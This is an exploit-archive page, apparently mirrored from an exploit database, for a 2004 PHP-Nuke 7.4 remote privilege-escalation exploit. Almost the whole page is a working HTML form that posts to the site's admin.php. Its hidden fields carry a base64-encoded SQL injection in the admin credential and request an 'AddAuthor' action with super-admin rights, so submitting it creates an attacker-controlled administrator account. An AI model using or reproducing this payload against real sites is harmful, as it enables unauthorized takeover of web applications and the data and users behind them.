[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Nuke 7.4 Remote Privilege Escalation
# Published : 2004-09-08
# Author : mantra
# Previous Title : Turbo Seek Null Byte Error Discloses Files to Remote Users
# Next Title : TorrentTrader 1.0 RC2 SQL Injection Exploit
A demonstration exploit HTTP form is provided:
<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
# www.Syue.com [2004-09-08]